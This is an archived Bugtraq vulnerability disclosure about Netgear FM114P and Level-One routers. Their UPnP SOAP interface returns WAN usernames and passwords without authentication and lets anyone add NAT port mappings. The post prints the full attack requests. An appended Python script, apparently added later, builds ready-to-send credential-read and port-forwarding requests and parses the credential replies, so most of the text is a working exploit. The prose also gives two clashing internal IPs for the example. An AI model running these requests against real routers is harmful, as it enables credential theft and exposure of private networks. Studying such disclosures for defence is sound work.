RE: Another security problem in Netgear FM114P ProSafe Wireless Router firmware (also level-one)

From: Björn Stickler (stickler@rbg.informatik.tu-darmstadt.de)
Date: 04/02/03

    From: Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de>
    To: <bugtraq@securityfocus.com>
    Date: Wed, 2 Apr 2003 22:57:57 +0200
    
    

    ADDITION:
    °°°°°°°°°

    It seems that several routers from Level-One are also vulnerable to the
    method described.
    Another nice feature is adding port mappings for passing through the
    NAT firewall.

    --- sample for passing port 139 (NetBIOS) from internal IP 192.168.0.2: ---

    POST /upnp/service/WANPPPConnection HTTP/1.1
    Content-Type: text/xml; charset="utf-8"
    SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
    User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
    Host: 192.168.0.1
    Content-Length: 1123
    Connection: Keep-Alive
    Pragma: no-cache

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
    <NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string"></NewRemoteHost>
    <NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui2">139</NewExternalPort>
    <NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">TCP</NewProtocol>
    <NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui2">139</NewInternalPort>
    <NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">192.168.0.6</NewInternalClient>
    <NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="boolean">1</NewEnabled>
    <NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="string">NetBios</NewPortMappingDescription>
    <NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
    dt:dt="ui4">0</NewLeaseDuration>
    </m:AddPortMapping>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

    regards, b.stickler

    -----Original Message-----
    From: Björn Stickler [mailto:stickler@rbg.informatik.tu-darmstadt.de]
    Sent: Wednesday, 2 April 2003 19:59
    To: 'bugtraq@securityfocus.com'
    Cc: 'betabugs@netgear.com'

    Hi,
    I found another security problem in the Netgear ProSafe wireless router model
    FM114P:
    when remote access and UPnP features are enabled, the WAN connection
    username and password can be retrieved without any authentication using
    UPnP. If remote management is enabled, anyone can do this from the web. This
    is done by using UPnP SOAP requests to the router with the functions
    GetUserName and GetPassword. I don't know why such functions exist, because
    router configuration is normally done via the web interface.

    ---- beginning of example request to get username --------------

    POST /upnp/service/WANPPPConnection HTTP/1.1
    HOST: 192.168.0.1:80
    SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
    CONTENT-TYPE: text/xml ; charset="utf-8"
    Content-Length: 289

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
       <s:Body>
          <u:GetUserName
    xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
       </s:Body>
    </s:Envelope>

    ---- end of example request to get username --------------

    affected firmware versions: --> v1.4 Beta Release 21 has been tested
                                --> all previous versions with UPnP may be affected

    Solution: disable remote management and/or UPnP until the bug is fixed by
    Netgear.

    regards, b.stickler

    http://intex.ath.cx
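The two requests quoted above (the GetUserName credential read from the original message and the AddPortMapping NAT punch-through from the addition) share one shape: a SOAP 1.1 envelope POSTed to the WANPPPConnection control URL with a matching SOAPACTION header. The following script is an added example, not code from the post or from Netgear/Level-One: it builds both requests with a computed Content-Length, parses the router's SOAP reply, and treats a SOAP Fault as the refusal a device that rejects the action would send. The router address, the sample replies and all function names are assumptions made for this illustration; the replies are constructed, not captured from a real device.

```python
# Added example, not code from the original post or from Netgear/Level-One:
# build the UPnP SOAP calls described above (GetUserName, GetPassword,
# AddPortMapping) and parse the SOAP reply. The router address, the sample
# replies and all helper names here are assumptions made for this illustration.
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

SERVICE = "urn:schemas-upnp-org:service:WANPPPConnection:1"
CONTROL_PATH = "/upnp/service/WANPPPConnection"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"


def soap_envelope(action, args=None):
    """Return the SOAP 1.1 body for one UPnP action; values are XML-escaped."""
    arg_xml = "".join(f"<{n}>{escape(str(v))}</{n}>" for n, v in (args or {}).items())
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" s:encodingStyle="{SOAP_ENC}">'
        f'<s:Body><u:{action} xmlns:u="{SERVICE}">{arg_xml}</u:{action}></s:Body>'
        "</s:Envelope>"
    )


def soap_request(host, action, args=None):
    """Return the raw HTTP/1.1 request (headers + body) as bytes.
    Content-Length is computed from the body rather than typed by hand."""
    body = soap_envelope(action, args).encode("utf-8")
    headers = (
        f"POST {CONTROL_PATH} HTTP/1.1\r\n"
        f"HOST: {host}\r\n"
        f'SOAPACTION: "{SERVICE}#{action}"\r\n'
        'CONTENT-TYPE: text/xml; charset="utf-8"\r\n'
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return headers.encode("ascii") + body


def add_port_mapping_request(host, ext_port, int_port, client,
                             proto="TCP", description="", lease=0):
    """AddPortMapping with the same in-arguments as the post's example.
    lease=0 is the post's NewLeaseDuration of 0 (no expiry requested)."""
    return soap_request(host, "AddPortMapping", {
        "NewRemoteHost": "",
        "NewExternalPort": ext_port,
        "NewProtocol": proto,
        "NewInternalPort": int_port,
        "NewInternalClient": client,
        "NewEnabled": 1,
        "NewPortMappingDescription": description,
        "NewLeaseDuration": lease,
    })


def parse_soap_response(xml_bytes):
    """Return the arguments of the first Body child as {name: text}.
    Raises ValueError on a SOAP Fault (assumed here to be how a device that
    refuses the action answers) or on an envelope without a Body."""
    root = ET.fromstring(xml_bytes)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) == 0:
        raise ValueError("no SOAP Body element")
    first = body[0]
    if first.tag == f"{{{SOAP_NS}}}Fault":
        raise ValueError("SOAP fault: " + (first.findtext("faultstring") or "?"))
    return {child.tag.split("}")[-1]: (child.text or "") for child in first}


# Constructed sample replies (not captured from a real device).
SAMPLE_USERNAME_REPLY = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
 s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetUserNameResponse xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewUserName>isp-account@example.net</NewUserName>
</u:GetUserNameResponse>
</s:Body>
</s:Envelope>"""

SAMPLE_FAULT_REPLY = b"""<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<s:Fault>
<faultcode>s:Client</faultcode>
<faultstring>UPnPError</faultstring>
</s:Fault>
</s:Body>
</s:Envelope>"""


if __name__ == "__main__":
    # Request 1: the credential read described in the original message.
    print(soap_request("192.168.0.1:80", "GetUserName").decode())
    print(parse_soap_response(SAMPLE_USERNAME_REPLY))
    # Request 2: map TCP/139 through to an internal host, as in the addition.
    print(add_port_mapping_request("192.168.0.1", 139, 139, "192.168.0.6",
                                   description="NetBios").decode())
    try:
        parse_soap_response(SAMPLE_FAULT_REPLY)
    except ValueError as e:
        print("refused:", e)
```

Against a real device the bytes returned by `soap_request` would be written to a TCP connection on the router's HTTP port; nothing in this script touches the network. Because `parse_soap_response` reads whatever sits first in the Body, it doubles as a check of an outgoing request: parsing the AddPortMapping body back gives the argument dictionary, which is a convenient way to confirm the mapping points at the intended internal client before sending it.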

